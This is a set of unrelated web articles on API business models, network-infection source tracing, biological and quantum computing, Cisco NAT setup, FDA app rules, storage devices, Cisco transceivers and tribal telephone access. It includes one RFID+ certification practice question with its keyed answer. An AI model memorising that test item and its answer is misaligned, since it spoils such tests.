The API Economy not only offers incredible opportunities to explore new ways to interact with devices and services, but also allows innovators to put a new spin on solving old problems. According to IBM, the API Economy is “the commercial exchange of business functions, capabilities, or competencies as services using web application programming interfaces.” The Internet makes it possible for devices and people all over the world to be connected, whereas APIs utilize hardware and software to exchange information over those connections. As organizations and the public continue to grow more comfortable with implementing API technology in day-to-day activities, the market for API products continues to expand.
The API Economy in Action
If you used your Facebook credentials to log in to a Disqus comment board today, or used a Google maps widget to locate a store you’re visiting later, you’ve already used two different APIs. APIs are also helpful beyond web browsers. For example, if you ordered more Bounty paper towels this morning with an Amazon Dash button, or turned down your home’s Nest thermostat from work using a mobile app, you’re already familiar with Internet of Things devices running APIs.
Succeeding in the Data Economy
APIs used to be developer tools, but now they’re a business model driver. Your business’s products and services can be reworked and implemented in inventive ways to generate new revenue streams. Succeeding in the API Economy is essentially the same as succeeding in the Data Economy—and many businesses find it helpful to treat the API itself as the new product. This may seem a bit unusual since the API shares a lot of assets with another product, but both need to stand alone. Google Maps and the Google Maps API, for example, are two different products that share some of the same primary services.
A well-implemented API will expand on an existing product or concept, which in turn will seize new business growth opportunities. As a general rule, an API should improve performance—making it easier, for instance, for a business to include a map on their website, or for a homeowner to fix thermostat settings remotely. However, APIs require a solid, reliable Internet infrastructure. If that IoT thermostat doesn’t get the message that it should turn off the air conditioning because the server that handles the communication is overloaded, the customer will be less than thrilled. Latency is also important: The communication needs to happen quickly or the customer may give up. Load testing services are essential to making sure your infrastructure is ready to handle communication for your API.
Play Well with Others
APIs are built around the concept of communication and should streamline a specific process with the goal of extending your business to the widest possible audience. Your business may also be on the receiving end of help from another organization’s API. For example, if you were designing a video streaming service aggregator app for phones and tablets, you would work with APIs from services like Netflix, Hulu, and Amazon to gather data on content available on each service. The flip side of pulling in data from multiple sources is that an API typically has to interact with multiple endpoints. For example, the hypothetical IoT thermostat would not only need to work with iOS devices to reach its full audience, but also on Android devices, Windows Phone devices, and desktop web applications.
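In practice, that aggregation is a loop over upstream APIs. The Python sketch below uses the common requests library; the service endpoints and response shapes are hypothetical, since each real provider defines its own:

```python
import requests

# Hypothetical endpoints -- real services publish their own URLs,
# authentication schemes, and response schemas.
SERVICES = {
    "service_a": "https://api.service-a.example/v1/titles",
    "service_b": "https://api.service-b.example/v2/catalog",
}

def aggregate(query):
    """Ask each upstream API the same question and merge the answers."""
    results = {}
    for name, url in SERVICES.items():
        resp = requests.get(url, params={"q": query}, timeout=5)
        resp.raise_for_status()
        results[name] = resp.json()
    return results
```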
A well-implemented API is seamlessly integrated into day-to-day activities and environments. When someone sees a Google Maps widget on a store website, they shouldn’t see it as an API, but as a convenient offering that enhances their experience. An effective API Economy strategy addresses what the audience wants or needs—and, most importantly, enhances their experience. | <urn:uuid:fc28e423-dca7-430f-878a-b48de5e91ff8> | CC-MAIN-2017-04 | https://www.apicasystem.com/blog/succeeding-api-economy/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281353.56/warc/CC-MAIN-20170116095121-00384-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.938654 | 763 | 2.578125 | 3 |
One of the problems when it comes to catching online criminals of any kind is the fact that it is often extremely difficult to pinpoint the origins of internet attacks – whether it’s malware, spam, or a rumor that can harm the subject of it.
Until now, this was possible only by scanning all potentially affected network nodes or address spaces for clues – a process that is simply too costly and takes way too much time to be considered globally applicable.
But things are about to change, as Swiss researcher Pedro Pinto and his team from the École Polytechnique Fédérale de Lausanne have revealed a new strategy for localizing the source of diffusion in complex networks.
It consists of applying a specific algorithm to measurements collected via only a small fraction of nodes (i.e., observation points) throughout the network, and they successfully proved that even by choosing 25 random observers or sensors, they could determine the source of the “infection” with 90 percent confidence.
If they chose well-connected observers, that percentage of confidence was achieved by using only 5 percent of the nodes within a network.
Originally devised to pinpoint the source of real-world epidemics, the technique can easily be applied to computer networks – no matter what their size is. And given that the Internet is a global system of interconnected computer networks, the application of this strategy seems only natural.
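The published estimator is more sophisticated, but its flavor can be captured in a toy sketch: record when the "infection" reached each observer, then score every candidate source by how consistently its shortest-path distances explain those arrival times. The code below is my own simplification, not the paper's algorithm:

```python
from collections import deque

def hops_from(graph, start):
    """Unweighted shortest-path hop counts from start (assumes a connected graph)."""
    dist, queue = {start: 0}, deque([start])
    while queue:
        u = queue.popleft()
        for v in graph[u]:
            if v not in dist:
                dist[v] = dist[u] + 1
                queue.append(v)
    return dist

def likely_source(graph, arrivals):
    """arrivals maps observer node -> arrival time. The candidate whose
    distances best line up with the arrival times (lowest spread) wins."""
    best, best_score = None, float("inf")
    for candidate in graph:
        dist = hops_from(graph, candidate)
        offsets = [arrivals[obs] - dist[obs] for obs in arrivals]
        mean = sum(offsets) / len(offsets)
        score = sum((x - mean) ** 2 for x in offsets)
        if score < best_score:
            best, best_score = candidate, score
    return best
```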
The researchers tested the technique against four different types of network structures, and the results were satisfactory every time. Of course, the more connections the chosen nodes had, the smaller percentage of them had to be monitored and pumped for information.
They tested the effectiveness of the algorithm on real data from a South African cholera outbreak and, according to H-Online, on information from the 9/11 terrorists’ publicly released data communications.
The paper the researchers released on Friday before last has garnered a lot of attention in various circles, but Pinto confirmed to Computerworld that computer security companies are the only ones who have contacted them so far, asking for additional information and gauging the ways the technique can be used to localize infection sources on the Internet. | <urn:uuid:155979f0-d971-4f13-a019-f01d4a4901c0> | CC-MAIN-2017-04 | https://www.helpnetsecurity.com/2012/08/13/scientists-create-algorithm-for-tracking-down-sources-of-online-attacks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280310.48/warc/CC-MAIN-20170116095120-00504-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.947038 | 443 | 3.15625 | 3 |
Usually, when we identify trends in computing at IT Business Edge, we are referring to the immediate future: a few months or, at most, a year or two ahead. But two recent pieces of news have implications worth paying attention to in a longer timeframe. And, as often is the case with futuristic computing, the ideas are strange: One is living computers based on rotten food (actually, Escherichia coli, or E. coli), and the other involves famously weird quantum science, in which the computer's individual bits aren't called on to be either a zero or a one, the bedrock process of today's devices.
Several sites, including TechEye.net, report on the use of E. coli for computations. The focus of the research is on the composition of logic gates. A logic gate, another fundamental underpinning of computing, takes one or more inputs to produce a single output. Put enough of these together and a full computer task can be completed.
There are seven types of logic gates. For instance, in an "and" logic gate (AND gate), all inputs (A and B) must be "true" (signified in computer-ese as a one) for the output also to be considered true. The other three possible combinations for a two-input AND gate (two falses, true and false, false and true) all create a false. OR gates work in a similar fashion, but the requirements to meet the conditions to reach a result of "true" are different. In an OR gate, A or B must be true for the result to be a one.
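In software, those truth tables are one-liners, which makes the contrast with gene-based or quantum gates easy to see. A quick Python illustration:

```python
def AND(a, b):
    return a & b  # 1 only when both inputs are 1

def OR(a, b):
    return a | b  # 1 when at least one input is 1

for a, b in [(0, 0), (0, 1), (1, 0), (1, 1)]:
    print(f"A={a} B={b}  AND={AND(a, b)}  OR={OR(a, b)}")
```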
The ones and zeros are created by higher and lower levels of electricity. That's where the advance was made. Researchers at the University of California at San Francisco, possibly doing their research in a poorly kept cafeteria, used genes inserted into E. coli strains as the logic gates. Subsequently, the gates released a chemical signal that enabled them to connect to each other as they would on a circuit board, the story says. The ultimate goal was to create a language that would, in essence, enable code to be written as it is for more traditional logic gates.
The other advance was reported by Ars Technica, which describes research published in Applied Physics Letters by English and Australian researchers.
Anyone who has read anything about the quantum world probably knows what comes next. In quantum computers, the story says, quantum bits (qubits) are one and zero simultaneously. The operations that are done to the qubits don't switch them from ones to zeros or vice versa; rather, they change the probability that the qubit will eventually be in either state. The second, and related, idea is that an operation on one of the qubits impacts all on that string.
The story says that mistakes come from two areas. One is the "intrinsic uncertainty" associated with quantum operations. The other is purely physical: The quantum world is weird because it is so small. This makes it tricky (to say the least) to come up with equipment that can poke and prod the qubits without gumming things up. The remainder of the story describes what the team set out to do (which involves directional couplers and interferometers) and what it means.
It is too early to tell precisely what these new types of computers would be used for or when the research will show up in products. Quantum science already plays a role in security, but computers based on the approach would be orders of magnitude more complex.
In any case, it is important to have a general idea of what is going on. Scientists have long suspected that Moore's Law on the continuing growth of computing power and reduction in its costs would, like Brett Favre, eventually hit its physical limits. One of these seemingly strange approaches, or both, may allow Moore to play on for decades longer.
In Part 1 of this series, we discussed static NAT. While static NAT works, since it uses manually constructed “one-to-one” translations, it’s not scalable. For example, translating all of the legal host addresses on the 10.1.2.0/24 subnet would require 254 lines. And if we were dealing with the entire 10.0.0.0/8 network, covering all possible addresses would require over sixteen million lines! The solution is “dynamic NAT”.
In dynamic NAT, instead of specifying the translations one-by-one, you give the NAT device some rules that specify which addresses are translated to what. In the case of a Cisco router, the addresses to be translated are specified by an access control list (ACL), and the addresses to which they are translated are specified by a “pool”.
For example, to translate any address on the 10.1.2.0/24 subnet (those permitted by ACL 1) to an address on the 192.0.2.0/24 network (as specified by the pool named “Test”), you could do this:
- Router(config)#ip nat inside source list 1 pool Test
The translation tells the router that if a packet with source address matching a permit in ACL 1 hits the inside interface, and it is bound for the outside interface, translate the source address to an available address in the pool named “Test”. Obviously, you also need to create ACL 1 and the pool “Test”. Let’s create the ACL first:
- Router(config)#access-list 1 permit 10.1.2.0 0.0.0.255
As is the usual case with a standard IP ACL, this list specifies the source address. Remember that ACLs use a wildcard (inverse) mask. Now, let’s create the pool named “Test” (pool names are case-sensitive):
- Router(config)#ip nat pool Test 192.0.2.0 192.0.2.127 netmask 255.255.255.0
The “netmask” specified for the pool is the subnet mask of the network or subnet containing the translated addresses, and this is not a wildcard (inverse) mask. If you prefer, you can specify the pool’s mask using “slash” (“bitcount”, “CIDR”) notation by using the “prefix-length” option:
- Router(config)#ip nat pool Test 192.0.2.0 192.0.2.127 prefix-length 24
Notice that while the ACL covers 254 addresses, the pool only provides 127 addresses (due to the “255.255.255.0” or “/24” mask, the pool knows that the address 192.0.2.0 is not legal). Why specify only 127 addresses? First, it’s not likely that all 254 host addresses are actually in use. Second, even if they are in use, it’s not likely that all 254 hosts are simultaneously trying to access the Internet (the company may run several work shifts, for example). The size of the pool only needs to cover the number of hosts that simultaneously require translation, and this conserves public IP addresses (a good thing). Also, if the public addresses are being rented from a provider (typically the case), conserving public IP addresses can save money.
Finally, if it hasn’t already been done, the “inside” and “outside” interfaces must be assigned, just as with static NAT. Let’s assume that FastEthernet0/1 is on the inside, and Serial1/2 is on the outside:
- Router(config)#interface fa0/1
- Router(config-if)#ip nat inside
- Router(config-if)#int s1/2
- Router(config-if)#ip nat outside
If we view the translation table (show ip nat translations) at this point, we would see no entries, because no traffic matching the ACL has attempted to traverse the router from “inside” to “outside”. To trigger a translation, we generate traffic from an “inside” host that’s destined for an “outside” host.
For TCP, entries are placed in the table when a session is built (when the NAT device sees the “SYN” marking the start of a three-way handshake) and removed when the session is terminated. For UDP and ICMP, the translation table entries are created with the first packet in a particular data stream, and the entries are removed when an inactivity timer expires.
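On a Cisco router, a few standard commands are useful for watching this behavior (exact output varies by IOS version, so treat these as a starting point):

- Router#show ip nat translations
- Router#show ip nat statistics
- Router#clear ip nat translation *

The first shows the current translation table, the second shows hit counts and pool usage, and the third flushes dynamic entries so you can watch them rebuild.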
Next time, we’ll examine PAT, a variation of dynamic NAT.
Author: Al Friebe | <urn:uuid:212bd9b1-7728-42b0-a233-01e994e2bcc9> | CC-MAIN-2017-04 | http://blog.globalknowledge.com/2009/07/27/nat-and-pat-part-2/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281001.53/warc/CC-MAIN-20170116095121-00165-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.862251 | 1,042 | 2.65625 | 3 |
The Food and Drug Administration plans to apply the same strict regulations to mobile apps as it does to medical devices, such as blood pressure monitors, if those apps perform the same functions as stand-alone or computer based devices.
The FDA has developed a “tailored” approach to regulation of mobile apps that would allow use of some apps without oversight, according to Dr. Jeffrey Shuren, director of the FDA’s Center for Devices and Radiological Health. “Some mobile apps carry minimal risks to consumers or patients, but others can carry significant risks if they do not operate correctly,” he said. “The FDA’s tailored policy protects patients while encouraging innovation.”
The FDA said that "if a mobile app is intended for use in performing a medical device function (i.e. for diagnosis of disease or other conditions, or the cure, mitigation, treatment, or prevention of disease), it is a medical device, regardless of the platform on which it is run,” in a guidance document for industry and its staff released Monday.
The agency said its oversight approach to mobile apps “is focused on their functionality, just as we focus on the functionality of conventional devices, with oversight not determined by the platform.”
Bakul Patel, senior policy advisor to Shuren, said the agency would regulate a mobile medical app that helps measure blood pressure by controlling the inflation and deflation of a blood pressure cuff (a blood pressure monitor), just as it regulates traditional devices that measure blood pressure
But, he said, a mobile app that doctors or patients use to log and track trends with their blood pressure would not be regulated as a device.
Mobile medical apps that recommend calorie or carbohydrate intakes to people who track what they eat are also not within the current focus of FDA's regulatory oversight. “While such mobile apps may have health implications, FDA believes the risks posed by these devices are low and such apps can empower patients to be more engaged in their health care,” the agency said.
The agency said that, based on industry estimates, 500 million smartphone users worldwide will be using a health care application by 2015; by 2018, 50 percent of the more than 3.4 billion smartphone and tablet users will have downloaded mobile health applications. These users include health care professionals, consumers, and patients.
The FDA emphasized it won’t regulate the sale or ordinary use of smartphones and tablets, allaying concerns that the agency would try to regulate all mobile gadgets. The new regulations do not cover mobile electronic health record apps.
Mobile apps, the FDA said, can help people manage their own health and wellness, promote healthy living, and gain access to useful information when and where they need it, and the agency “encourages the development of mobile medical apps that improve health care and provide consumers and health care professionals with valuable health information.” | <urn:uuid:4dac745f-d76b-4475-b700-75bd99558844> | CC-MAIN-2017-04 | http://www.nextgov.com/mobile/2013/09/fda-will-regulate-some-mobile-medical-apps-devices/70760/?oref=dropdown | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280086.25/warc/CC-MAIN-20170116095120-00285-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.953069 | 591 | 2.546875 | 3 |
These questions are derived from the Self Test Software Practice Test for CompTIA’s RFID+ exam.
Objective: RF Physics
SubObjective: Identify RF propagation/communication techniques
Single Answer, Multiple Choice
Which mechanism enables a tag’s circuit and an interrogator to communicate with each other to transmit power and information?
- coupling
- encoding
- operating frequency
- sequential (SEQ)
Coupling enables a tag’s circuit and an interrogator to communicate with each other to transmit power and information. Coupling occurs when the magnetic fields produced by one circuit overlap those produced by another circuit. The different coupling methods used for RFID applications are inductive coupling, capacitive coupling, and backscatter coupling.
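As a supplementary note (this is standard circuit theory, not quoted from the reference texts below), inductive coupling is often characterized by two relationships: the voltage induced in the tag coil by the interrogator's changing current, and the coupling coefficient between the two coils:

$$v_2 = M\,\frac{di_1}{dt}, \qquad k = \frac{M}{\sqrt{L_1 L_2}}, \qquad 0 \le k \le 1$$

where M is the mutual inductance between the reader and tag coils and L1 and L2 are their self-inductances; the closer k is to 1, the more power and signal the tag can draw from the interrogator's field.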
Encoding assists in securing the tag data that is wirelessly communicated to the interrogators. Encoding encrypts the tag data to ensure that the data is read only by authorized interrogators. Several encoding schemes, such as biphase Manchester encoding, pulse interval encoding, or biphase space encoding, are used in RFID systems.
Operating frequency is an electromagnetic frequency that enables tags to power up and communicate with interrogators. The frequency ranges used in RFID systems are low frequency (LF), high frequency (HF), ultra high frequency (UHF), and microwave. LF has the shortest read range and microwave has the longest. Depending on the system requirements and multiple factors, you can choose the appropriate frequency to be used in an RFID system.
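A quick worked example (the frequencies used are typical values, not figures from the reference texts) shows why the coupling method tends to track the frequency band. The free-space wavelength is \( \lambda = c/f \):

$$\lambda_{LF} \approx \frac{3\times10^{8}}{125\times10^{3}} \approx 2400\ \text{m}, \qquad \lambda_{HF} \approx \frac{3\times10^{8}}{13.56\times10^{6}} \approx 22\ \text{m}, \qquad \lambda_{UHF} \approx \frac{3\times10^{8}}{915\times10^{6}} \approx 0.33\ \text{m}$$

Because LF and HF wavelengths are enormous compared with any practical read distance, those tags couple in the near field (inductive or capacitive coupling), while UHF and microwave tags, whose wavelengths are comparable to the read range, rely on far-field backscatter coupling.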
SEQ is a procedure used in RFID systems to share the RF energy and transfer information between tags and interrogators by using pulse operation. In SEQ, the communication between tags and interrogators takes place for a limited period of time.
RFID Essentials, Chapter 3: Tags, Coupling, pp. 63-67.
RFID+: The Complete Review of Radio Frequency Identification, Chapter 1: Primer, Coupling, pp. 36-38. | <urn:uuid:0f1d8ec5-b2b6-4e8a-81cb-a093163cdfbf> | CC-MAIN-2017-04 | http://certmag.com/rf-physics/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281450.93/warc/CC-MAIN-20170116095121-00495-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.863837 | 404 | 2.984375 | 3 |
Personal Storage Devices: An Overview
Once upon a time, the most advanced computers held half a gigabyte, floppy disks were five inches wide and actually floppy, and most consumers’ data storage needs didn’t extend beyond a WordPerfect document. But with the onslaught of digital photos, home videos, music files and a vast array of other applications and programs, personal data storage needs have continued to grow by leaps and bounds.
Once the sole means of data storage and portability, floppy disks still have a place in consumers’ storage arsenal. However, their presence is quickly fading. Now offered in a 3.5-inch format, floppy disks generally hold 1.44 megabytes of storage. Rarely sold individually, these disks are usually found in packs of at least five to 10 and sell for around $5 to $7 per pack.
Although consumers still use floppy disks, the rise in digital photography and media has lessened their appeal. To pick up the slack, Zip disks came onto the scene about a decade ago. These disks typically hold up to 100MB (or the equivalent of about 70 floppy disks) on one disk. They retail for about $8 each and are usually sold in packs of three to five disks. Zip disks rose in popularity in the ’90s as consumers increased their appetite for storage. However, that appetite soon outgrew Zip-disk capacity as consumers turned their attention toward other forms for storage.
Zip-disk popularity was also hindered by the need to own a Zip drive in order to use the disk. At around $100 each, Zip drives were often too expensive compared to other forms of data storage. (When I was a college student, Zip drives were a hot commodity for many journalism majors because we constantly had to transport large amounts of digital photos and text. However, because of the lack of available Zip drives, we often ended up using our e-mail accounts for storage. E-mail could hold a relatively large amount of information, it was accessible everywhere and, most importantly for college students, it was free.)
Zip-disk maker Iomega has since released a newer, higher capacity disk called the REV. These disks can hold up to 90GB of compressed data, and they retail for around $60 each. Although these disks can hold large amounts of data, like the Zip disks before them, REV disks only work with REV drives, which retail around $400.
Picking up where other disks fell short, recordable CDs and DVDs have become storage staples for many consumers. Recordable CDs, or CD-Rs, each hold up to 700MB of data or 80 minutes of music. DVD-Rs can hold up to 4.7GB of information or 120 minutes of video. Because of their storage capacity and inexpensive price (a 6-pack of DVD-Rs retails for about $10), CD-Rs and DVD-Rs have become one of the most popular forms of data storage.
Adding to their popularity, these disks also have rewriteable capabilities. DVD-RWs and CD-RWs can be burned and reburned multiple times, making them convenient, portable, non-static and easily accessible storage devices.
Portable USB Drives
Another rewritable, portable and easily accessible storage device came onto the market in the late ’90s. Portable USB drives, also known as thumb drives, flash drives, pen drives, USB keys and a wide variety of other names, are small enough to carry on a key chain, yet powerful enough to store digital images, music and multimedia files.
They’ve become popular because of their small size, portability and accessibility. With a USB drive, consumers don’t have to store files on multiple floppy disks or CDs or worry about finding computers that had a DVD, CD, floppy or Zip drive. All computers have USB ports. In addition, because of their portability, USB drives have eliminated the need for users to turn e-mail accounts into storage devices.
Many portable USB drives also include safeguards such as password protection, data encryption and write protection to guard data, making them safer than CDs and DVDs. Portable USB drives range in storage capacity from 250MB to 6GB and in price from $20 to $200.
As the appetite for portable storage has grown, many people have realized that the music devices they already carry around also can be used as portable storage units. iPods and other MP3 players range from 128MB to 60GB and range in price from $40 to $400.
There are three basic types of MP3 players that all offer various storage capacities: Flash memory players, expandable memory players and hard drive players. Flash memory players usually offer 128 to 512MB and can store enough MP3s for a few hours of music. Expandable memory players feature ports for additional memory cards, so users can start with a smaller capacity and get additional cards as their data needs grow. Hard drive players, such as the iPod, range from 4GB to 60GB. A 60GB player can store up to 15,000 songs, or the equivalent of six weeks worth of continuous music.
Personal Digital Assistants, or PDAs, also have grown into the storage-device market. Because many people already carry these around on a daily basis, they’ve started to become storage units as well. PDAs range in storage capacity from 32MB of built-in storage to 4GB.
Most PDAs now come equipped with an expansion slot. Each slot accommodates a different type of expansion card. The most common types are Secure Digital cards, CompactFlash memory and MultiMediaCards, or MMCs. Some PDAs also offer dual expansion slots, meaning that they can accommodate more than one kind of memory card.
PDAs range in price from $100 to upward of $700. The more expensive versions don’t necessarily offer more memory (generally just 256MB). Instead, they come with features such as a GPS unit.
Combining the storage capabilities of CD-Rs, the portability of USB drives, the functionality of PDAs and the ubiquity of MP3 players are the newest versions of cell phones.
These multi-tasking phones, such as the BlackBerry and Treo, range in price from $250 to $500. They usually offer 16 to 64MB of flash memory as well as ports for additional memory cards. They feature wireless Internet, organizers, software programs, e-mail access, cameras, text messaging, walkie-talkies, GPS units, tethered modems and MP3 players. And of course, you also can use them as phones. | <urn:uuid:4c8595eb-2bc5-4262-a23c-0a7fc226dbdb> | CC-MAIN-2017-04 | http://certmag.com/personal-storage-devices-an-overview/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280133.2/warc/CC-MAIN-20170116095120-00129-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.963035 | 1,359 | 2.625 | 3 |
The optical communication marketplace offers several types of fiber optic transceivers, including SFP, GBIC and X2. Cisco is a brand known for the strong performance of its fiber optic products.
As one of the fundamental fiber optic transceivers, the Cisco SFP is widely deployed; its main advantages are low price and high performance. The small form-factor pluggable (SFP) is a compact, hot-pluggable transceiver used for both telecommunication and data communications applications. Its form factor and electrical interface are specified by a multi-source agreement (MSA). It interfaces a network device motherboard (for a switch, router, media converter or similar device) to a fiber optic or copper networking cable, and it is a popular industry format jointly created and supported by many network component vendors. Cisco SFP transceivers are designed to support SONET, Gigabit Ethernet, Fibre Channel and other communications standards. Because of its smaller size, the SFP has largely displaced the formerly ubiquitous gigabit interface converter (GBIC); the SFP is sometimes referred to as a Mini-GBIC, although no device with this name has ever been defined in the MSAs.
So what is a GBIC? As noted above, GBIC is short for gigabit interface converter, a transceiver standard commonly used with Gigabit Ethernet and Fibre Channel since the 1990s. By providing a standard, hot-swappable electrical interface, one gigabit port can support a wide range of physical media, from copper to long-wave single-mode optical fiber, at lengths of hundreds of kilometers. A Cisco GBIC is a transceiver that converts serial electrical signals to serial optical signals and vice versa. In networking, a GBIC is used to interface a fiber optic system with networks such as Fibre Channel and Gigabit Ethernet. The GBIC lets designers build one kind of device that can be adapted for either optical or copper applications, and because GBICs are hot-swappable, they make it easier to upgrade electro-optical communication networks.
For higher capacity, a Cisco X2 transceiver is required. The Cisco X2 is a 10G fiber optic transceiver whose design was based on the earlier XENPAK standard. Internally, the X2 works much like XENPAK, and a single X2 transceiver can serve all 10G Ethernet optical port functions. The X2 is about half the size of a XENPAK module, which makes it suitable for high-density installations. The Cisco X2-10GB-SR is one of the most popular X2 transceivers. It is a multimode module targeted at 10G applications: it works over 850nm multimode fiber, its optical interface is duplex SC, and it links equipment to fiber optic networks over multimode fiber at distances of up to 300 meters. It is used in 10 Gigabit applications, including Ethernet and Fibre Channel.
Besides SFP, GBIC and X2, there are other Cisco fiber optic transceivers for various uses, such as the XENPAK transceiver mentioned in the introduction of the Cisco X2. For more information, you can visit FiberStore, a leading fiber optic products supplier from China. | <urn:uuid:9f45b891-b2c5-4d91-b31b-bffa38be06c5> | CC-MAIN-2017-04 | http://www.fs.com/blog/serval-cisco-fiber-optic-transceivers.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280221.47/warc/CC-MAIN-20170116095120-00551-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.927567 | 755 | 2.546875 | 3 |
For those living on tribal reservations, the Digital Divide appears to be of little concern. Instead, many are still waiting for the basic telecommunications technology most people take for granted.
The good news is that the efforts of American Indian leaders to bring the situation to light are finally paying off. American Indian-owned telecommunications companies are multiplying, and government interest in remedying the situation is mounting. The FCC, in particular, has not only taken notice, it is actively implementing measures to boost service to reservation territories.
The Analog Divide
While 94 percent of the general population enjoys regular telephone service, only about 47 percent of American Indians can say the same. In places such as the Navajo Reservation in New Mexico, the largest in the United States, the figure is 22.5 percent -- leaving 453,269 households without phone service. According to Raymond Gachupin, governor of the Native American Pueblo of Jemez, N.M., it's a recipe for disaster.
"A couple of years ago, a young girl living on the reservation had some kind of a seizure at her home," said Gachupin. "Her boyfriend frantically ran from house to house trying to look for a telephone. When he finally did find one, the lines were down."
The man ran to the Tribal Sheriff's Office to use the radio in the sheriff's vehicle, but the sheriff had to go about a half mile up to a high point to transmit to the Bureau of Indian Affairs in Albuquerque. By the time he got through, the girl had died.
According to FCC research, it has taken some American Indians over a decade to have a phone installed. Even where rural phone companies are willing and able to install a telephone, fees are often prohibitive. "Incredibly, we've heard stories about Native American communities being charged between $40,000 to $150,000 just to install one line," said FCC Chairman William Kennard.
For those fortunate enough to have phone service, the bills are often exorbitant. Calling friends, family or schools typically ends up requiring a long distance charge or a toll call. Quality of service is often spotty and connections poor due to badly maintained equipment. "If you don't have a basic communications infrastructure, how can you provide adequate health care or education or expect to attract high-paying jobs?" asked Kennard.
A case in point is the Navajo Nation. Spanning three states -- Arizona, New Mexico and Utah -- it covers roughly 25,000 square miles with a population of about 172,000 and an additional 53,000 living outside the reservation. Fifty-one percent do not have indoor plumbing, 48 percent lack complete kitchen facilities, 54 percent still use wood as their major heating source and 77 percent have no telephone service.
While those numbers are a cause for concern, another statistic has Navajo leaders anxious for immediate action. Currently, there are 250 schools throughout the nation and an estimated 44,000 Navajo enrolled in grades K-12. "Providing them with access to information technology now is a big issue for us," said Navajo spokesperson George Arthur. "We don't want these next generations to be left behind."
Over the past year, the American Indian community has forced the issue into the public eye. President Clinton, for instance, addressed the problem during a recent visit to the Lakota Sioux and Navajo nations. As a result, the White House is proposing a significant budget increase for American Indian programs. This includes $2 billion in tax incentives to encourage the private sector to donate computers, sponsor community technology centers and provide technology training for workers. It also earmarks $150 million to train American Indian teachers in the effective use of classroom technology, as well as $100 million to create 1,000 community technology centers. Commercial-sector technology support is following suit, with millions of dollars donated by Microsoft, IBM, Kellogg's, Compaq, America Online, WebMD and several others.
Perhaps the most important government action to date, though, is the FCC's introduction of two new programs that offer telephone access to people in reservation areas for a minimal fee. Kennard said these new initiatives will "provide Native Americans with the same kind of dependable, affordable service that most Americans have enjoyed for generations."
Administered jointly by the federal and state governments, the first program, called Link-Up America, provides funding for people of low-incomes that want to receive phone service. The other program is called the Lifeline Assistance Program, which, at a rate of $1 per month, makes paying a monthly phone bill affordable, even for the poorest of Americans.
The FCC is also removing the cap on federal Universal Service funds for carriers that purchase exchanges on tribal lands. Further, the agency is revising the practice of averaging the cost of serving high-cost tribal lands with low-cost areas when calculating support amounts.
Native American Support
Representing 19 Pueblo governments in New Mexico, the All Indian Pueblo Council backs the efforts of the FCC as an investment in a brighter future. After all, more than half of the 70,000 Pueblo Indian citizens are 18 or younger. "It's important that we correct the lack of affordable telephone service, as it impedes their access to knowledge and education," said Stanley Pino, chairman of the All Indian Pueblo Council.
Taking a long-term view, Pino points to the relatively recent transformation of the West from wilderness to high-tech affluence. "What we want is the same opportunity," said Pino. "When we learn that the national average telephone penetration rate is 94 to 98 percent and we've been struggling to get even 40 percent in many of the pueblos, we know something is wrong."
According to Pino, having strong, up-to-date telecommunications technology is the first step in establishing a sound technological foundation that can assist in the economic rejuvenation of many reservations. To that end, several organizations are harnessing the FCC and other government initiatives to bring service up to speed on tribal lands.
Tamsco, based in Calverton, Md., is committed to bringing telecommunications systems to American Indian areas. The company has just installed satellite systems in 54 remote American Indian schools that had little or no phone lines and no previous Internet capabilities. The Bureau of Indian Affairs and E-Rate, a federal program designed to subsidize Internet access in schools and libraries, are funding this project.
"Now that we have installed the satellite systems, we are following up with remote network management tools and a virtual help desk," said Tamsco Chief of Staff Fletcher Brown. Through the use of this system, Tamsco network managers can remotely assist tribes in resolving network difficulties.
In some areas, American Indian communities have made great strides in increasing phone penetration by forming tribally owned telecom companies. "It's the six Native American-owned telephone companies that have done the most to improve telephone service on reservations," said Madonna Peltier Yawakie, president of Turtle Island Telecommunications, an American Indian-owned telecommunication consulting and engineering company located in Brooklyn Park, Minn. "Not only have they improved and expanded service, they've done something concrete to provide employment." She strongly believes that American Indian ownership is the surest route to bridging the technological chasm.
One tribe taking matters into its own hands is the Mescalero Apache, a Southern New Mexico tribe on a 723,000 square-mile territory with a population of less than 4,000. It has recently formed Mescalero Apache Telecom, not only to expand basic phone service beyond the current level of 40 percent, but also to ring the reservation with a fiber-optic network and introduce high-speed Internet access. The visionaries behind the project view it as far more than the provision of basic amenities.
"This is all about creating the infrastructure to attract investment in the same way that an emerging market needs to lure foreign capital," said General Manager Godfrey Enjady. "Putting in phone lines and other utility services will eventually bring industry and jobs to our people."
Enjady expects the FCC's actions to further increase the number of American Indian-owned phone companies.
In South Dakota, the oldest American Indian-owned phone company, Cheyenne River Sioux Tribe Telephone Authority (CRSTTA), is feeling the benefits of the FCC's Link-Up program. "In the first month, we signed up 160 customers to the program and it hasn't slowed down," said CRSTTA's J.D. Williams. "We anticipate the program increasing our penetration rate from its current 75 percent to as much as 90 percent."
Though all agree that these actions are a step in the right direction, some feel that much more needs to be done. "A lot of the FCC information has not gotten out to the Native American communities," said Yawakie. "As a result, many are not aware of the programs and don't know how to access them."
The Bottom Funding Line
